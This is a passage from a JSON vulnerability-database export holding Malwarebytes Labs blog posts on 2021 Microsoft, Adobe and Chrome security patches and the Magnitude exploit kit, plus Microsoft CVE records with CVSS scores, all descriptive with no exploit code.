[CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably, the update fixes five vulnerabilities in Adobe Acrobat and Reader, several of them critical. 
Acrobat's determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Which is why we try and link you to the Mitre list of CVE\u2019s where possible. It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T14:41:47", "description": "Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.\n\nSo, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.\n\nChrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. 
So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.\n\nOr, as Malwarebytes' Director of Threat Intelligence, J\u00e9r\u00f4me Segura, put it:\n\n> "The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come."\n\n### Magnitude EK\n\nEnter the Magnitude exploit kit. [Researchers](<https://twitter.com/AvastThreatLabs/status/1450476708939767815>) have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit compromised websites, and its payload of choice is the [Magniber ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>).\n\n### The vulnerabilities\n\n[CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google's open source high-performance JavaScript and WebAssembly engine. This vulnerability was [patched in April](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>).\n\n[CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>) is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. 
This vulnerability was [patched in June](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>).\n\n### PuzzleMaker\n\nPractically the same combination of vulnerabilities [was described in June](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) when Microsoft fixed seven zero-days, including the CVE-2021-31956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it's highly likely that it was the same as Magnitude has been found leveraging now.\n\n### Payload\n\nThere is no malicious payload attached to the Magnitude exploits yet; the attack just exfiltrates the victim's Windows build number. But reportedly, this is Magnitude EK\u2019s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.\n\n### How to protect yourself\n\nIt is only on rare occasions that we write about vulnerabilities and then tell you there isn\u2019t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium-based browsers (like Edge), but have disabled its automatic updates and haven\u2019t updated since April. You would also have to run on a non-updated Windows system since June, or run Chrome with the _--no-sandbox_ switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.\n\n### Enable automatic updates\n\nIf you want to save yourself the trouble of manually installing updates, there are a few things you can do. 
For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: _chrome://settings/help_. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.\n\nIn Windows 10 you can select the Start button, then select _Settings > Update & security > Windows Update_. Select _Advanced options_, and then under _Choose how updates are installed_, select _Automatic (recommended)_.\n\nStay safe, everyone!\n\nThe post [Chrome targeted by Magnitude exploit kit](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T12:47:42", "type": "malwarebytes", "title": "Chrome targeted by Magnitude exploit kit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-131956", "CVE-2021-21224", "CVE-2021-31956"], "modified": "2021-10-21T12:47:42", "id": 
"MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-14T18:35:22", "description": "Google _[announced](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>)_ on Monday that it will be issuing patches for 11 high severity vulnerabilities found in Chrome, including two that are currently being exploited in the wild. The patch, which is part of the Stable Channel Update for Chrome 93 (93.0.4577.82), will be released for Windows, Mac, and Linux (if it hasn\u2019t already). Chrome users are expected to see the roll out in the coming days and weeks.\n\nReaders should note that other popular browsers such as Brave and Edge are also Chromium-based and therefore likely to be vulnerable to these flaws too. Keep an eye out for updates.\n\nYou can check what version of Chrome you are running by opening About Google Chrome from the main menu.\n\nThe About Google Chrome screen tells you what version you are running and whether it is up to date\n\n### The vulnerabilities\n\nThe fixes address high severity vulnerabilities reported to Google by independent researchers from as early as August of this year. That said, the company has included names of the researchers who found the flaws in their announcement.\n\nThe two vulnerabilities that are being actively exploited\u2014namely, [CVE-2021-30632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632>) and [CVE-2021-30633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30633>)\u2014were submitted anonymously. 
The former is an "Out of bounds write" flaw in the V8 JavaScript engine and the latter is a "Use after free" bug in the Indexed DB API.\n\nBecause threat actors are currently exploiting the two aforementioned vulnerabilities, Google provides little to no information on how the attacks against these weaknesses are being carried out, or other precautionary measures users should be looking out for. Per Google:\n\n> Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\n\n### V8, the thorn in Chrome's side?\n\nNobody will be surprised to see that one of the in-the-wild exploits affects Chrome's V8 engine. \n\nAt the heart of every modern web browser sits a JavaScript interpreter, a component that does much of the heavy lifting for interactive web apps. In Chrome, that interpreter is V8. These components need to accommodate frequent updates and adhere to a bewildering array of web standards, while also being both fast and secure.\n\nChrome's [V8](<https://v8.dev/>) JavaScript engine has been a significant source of security problems. So significant in fact, that in August Microsoft\u2014whose Edge browser is based on Chrome\u2014announced an experimental project called [Super Duper Secure Mode](<https://blog.malwarebytes.com/reports/2021/08/edges-super-duper-secure-mode-benchmarked-how-much-speed-would-you-trade-for-security/>) that aims to tackle the rash of V8 problems by simply turning an important part of it off.\n\nA little under half of the CVEs issued for V8 relate to its Just-in-Time (JIT) compiler, and more than half of all \u2018in-the-wild\u2019 Chrome exploits abuse JIT bugs. Just-in-time compilation is an important performance feature and turning it off is a direct trade of speed for security. How much? 
According to our quick-and-dirty testing, turning off the JIT compiler makes JavaScript execution twice as slow in Edge.\n\n### 11 zero-days and counting\n\nTo date, the Google Chrome team has patched 11 zero-day vulnerabilities in 2021. The previous patches addressed the following vulnerabilities, some of which we have covered here in the Malwarebytes Labs blog:\n\n * [_CVE-2021-21148_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/02/update-now-chrome-patches-zero-day-that-was-exploited-in-the-wild/>)\n * [_CVE-2021-21166_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>)\n * CVE-2021-21193\n * [_CVE-2021-21206_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * [_CVE-2021-21220_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * CVE-2021-21224\n * CVE-2021-30551\n * CVE-2021-30554\n * CVE-2021-30563\n\nWith so much bad PR, you might expect Chrome's market share to suffer; yet, it remains by far the most popular browser. Users\u2014and the Google Chrome brand\u2014seem unaffected.\n\nMake sure you update your Chrome or Chromium-based browser once you see the patch available, or better still, make sure your browser is set to [update itself](<https://support.google.com/chrome/answer/95414?hl=en-GB&co=GENIE.Platform%3DDesktop#:~:text=Go%20to%20'About%20Google%20Chrome,Chrome%20to%20apply%20the%20update.>).\n\nStay safe!\n\nThe post [Update now! 
Google Chrome fixes two in-the-wild zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T16:28:47", "type": "malwarebytes", "title": "Update now! Google Chrome fixes two in-the-wild zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T16:28:47", "id": "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:34:09", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from 
CVE-2021-31199.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31201", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, 
"published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:07", "description": "Microsoft Defender Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Defender Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31985"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31985", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:08", "description": "Windows Remote Desktop Services\u00a0Denial of Service Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Remote Desktop Services\u00a0Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31968"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, 
"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-06-14T07:00:00", "id": "MS:CVE-2021-33739", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", 
"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-17T02:34:19", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\nThis vulnerability was addressed in Microsoft Edge (Chromium-based) in build 90.0.818.41 which was released April 16, 2021.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-22T20:16:16", "type": "mscve", "title": "Chromium: CVE-2021-21224 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-04-22T20:16:16", "id": "MS:CVE-2021-21224", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31956", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 
2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-33742", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:10", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution 
